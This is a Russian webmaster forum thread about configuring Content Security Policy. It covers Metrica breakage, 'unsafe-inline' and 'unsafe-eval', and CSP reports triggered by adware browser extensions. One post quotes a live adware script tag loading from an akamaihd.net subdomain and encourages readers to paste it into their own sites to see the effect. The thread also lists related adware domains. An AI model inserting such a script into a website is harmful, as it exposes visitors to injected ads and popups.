Настройка CSP - Content Security Policy

pavel419
На сайте с 03.05.2006
Offline
315
#281

nikdiv, может, они затаились)

Это я взял навскидку один из урлов, на которые у меня с сайтов уходили...

@RuSeoBot (http://s419.ru/ruseobot/)- первый seo-бот в Twitter, а теперь - и канал в Telegram (http://s419.ru/servisy/pervyj-poiskovyj-seo-kanal-v-telegram/) Мой сайт про виртуальную реальность (http://vr419.ru/) Как правильно покупать на Алиэкспресс (http://4ali.ru/)
yda4huk
На сайте с 19.03.2009
Offline
115
#282

У кого нибудь после настройки csp поломался счетчик метрики? Все переходы считаются но при этом пишется что счетчик на сайте не найден либо старая версия кода....

Как решить эту проблему? Все домены яндекса в csp открыты

pavel419
На сайте с 03.05.2006
Offline
315
#283

yda4huk, почему-то бывает, выскакивает mc.yandex.ru, даже когда ему дан доступ. Поищите в отчетах и дайте ему то, что он просит. Точнее, пропишите в нужную секцию.

У меня все зелененькое, CSP стоит на пятнадцати сайтах...

---------- Добавлено 19.02.2015 в 19:29 ----------

Хотя, я вот смотрю, например, ливер:

А потом метрику:

Она не показывает прироста, но она в целом показывает больше, чем ливер. И вроде оба счетчика всё корректно считают. Вот и понимай, как хочешь)

L
На сайте с 07.12.2007
Offline
351
#284
pavel419:
Так и есть, оно просто есть на всех сайтах.
Даже если там нет никакой рекламы и трафа сто человек в сутки!

"Оно" есть на ВСЕХ сайтах, поскольку это заражены браузеры пользователей. Они понастваили себе всяких расширений Смайликов, SpyVkontakte, Скидки и Купоны, Скачивалки музыки. И теперь, куда ни зайдут - везде видят "свою рекламу"

nikdiv:
Где-то в прошлой теме прочитал, что это плохие атрибуты, из за них ничего и не блокируется.

Да, 'unsafe-eval' и 'unsafe-inline' - "плохие атрибуты", тк снижают возможности CSP. Но без них не работает ни Директ, ни Адсенс.

Те, кто писал, что с ними ничего не блокируется - диванные теоретики, и ни разу не ставили CSP.

'unsafe-eval' и 'unsafe-inline' можно убирать на сайтах без рекламы, те - сайтах организаций.

pavel419:
Извиняюсь если было. Как заразить свой браузер? Проверить хочется.

Не надо заражать браузер - достаточно самому вставить на сайт яваскрипт-код,который прописывает вредоносный плагин.

Вот, например, код от плагина "классик-TV":

<script type="text/javascript" src="http://apidigihelpinfo-a.akamaihd.net/gsrs?is=isgizzRU&amp;bp=PB&amp;g=6d7f3d11-bd78-4c50-a206-798ba07b30aa"></script>
поставьте внутрь секции <head></head> на страницу сайта, отключите CSP и насладитесь креативом, который видят посетители.
pavel419:
Народ должен знать, что происходит!

Поставьте на ваш блок яваскрипт из абзаца выше - статья станет намного убедительнее: с выезжающими слева и справа рекламными блоками, фреймом под загнутым уголком страницы, попандер-окнами и прочей анимацией.

pavel419
На сайте с 03.05.2006
Offline
315
#285
Ladycharm:
"Оно" есть на ВСЕХ сайтах, поскольку это заражены браузеры пользователей. Они понастваили себе всяких расширений Смайликов, SpyVkontakte, Скидки и Купоны, Скачивалки музыки. И теперь, куда ни зайдут - везде видят "свою рекламу"

Это я еще вчера понял, просто думал, что срабатывает только на посещаемых ресурсах. А потом подумал, откуда плагинам знать мою посещаемость?...

Ladycharm:
Поставьте на ваш блок яваскрипт из абзаца выше - статья станет намного убедительнее: с выезжающими слева и справа рекламными блоками, фреймом под загнутым уголком страницы, попандер-окнами и прочей анимацией.

Юмор оценил, но у меня там какой-никакой траф с поисковиков всё же есть)

Так что нафиг такие риски)

L
На сайте с 07.12.2007
Offline
351
#286
pavel419:
Так что нафиг такие риски)

Поставь на 5 минут и сделай принтскрины - страница До и После.

Впечатляет, особенно ифрейм с отогнутым уголком: тянешь и смотришь что там, а на следующий раз - там уже другая реклама.

pavel419
На сайте с 03.05.2006
Offline
315
#287

Ladycharm, Клево, это для тех, кому лень смотреть самому)

До

После



---------- Добавлено 19.02.2015 в 23:09 ----------

Адсенс, говорите, не кликают?🍿🤪:D

V2
На сайте с 17.12.2013
Offline
63
#288

Ladycharm, а вот с такими вещами что делать?:


1 - "blocked-uri":"chromenull://","source-file":"about","line-number":17
2 - "blocked-uri":"data","status-code":200
3 - "blocked-uri":"data","status-code"

Особенно много в отчетах второго варианта.

L
На сайте с 07.12.2007
Offline
351
#289
pavel419:
Адсенс, говорите, не кликают?🍿🤪:D

Да, красиво твой блог обрекламили. У этих "гавриков" более 120 доменов работает с такими же скриптами: apiwiseenhanceco-a.akamaihd, apimegabrowsebiz-a.akamaihd.net, apitechgilenet-a.akamaihd.net....

На рисунке "До" напрягла ссылка внизу слева, и вспомнился пост Оптимизайки про superfish. Откуда у тебя superfish.com взялся?:

jpg sfish.jpg
pavel419
На сайте с 03.05.2006
Offline
315
#290

Ladycharm, да, суперфиш я заметил, но там не совсем "до".

Когда я вставил код, чтоб посмотреть, что будет, я потом полез редактировать пост, а оно не дает! Тут же меня куда-то кинуло) Вобщем, я там метался, чтоб в редактирование залезть, в итоге выпилил. Я не помню, видимо, в этот момент скрин и делал. То есть он был сделан не "До", а после удаления шняги.

Потом посмотрел на чистом блоге, суперфиша вроде нету, по крайней мере в консоли:



---------- Добавлено 20.02.2015 в 13:06 ----------

Кстати, а гугл не может догружать аналитикс вместе с адсенсом, чтоб ПФ мерять?

Просто ломится кое-где на сайтах, где аналитикса нет. Может это и не зловреды вовсе?

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий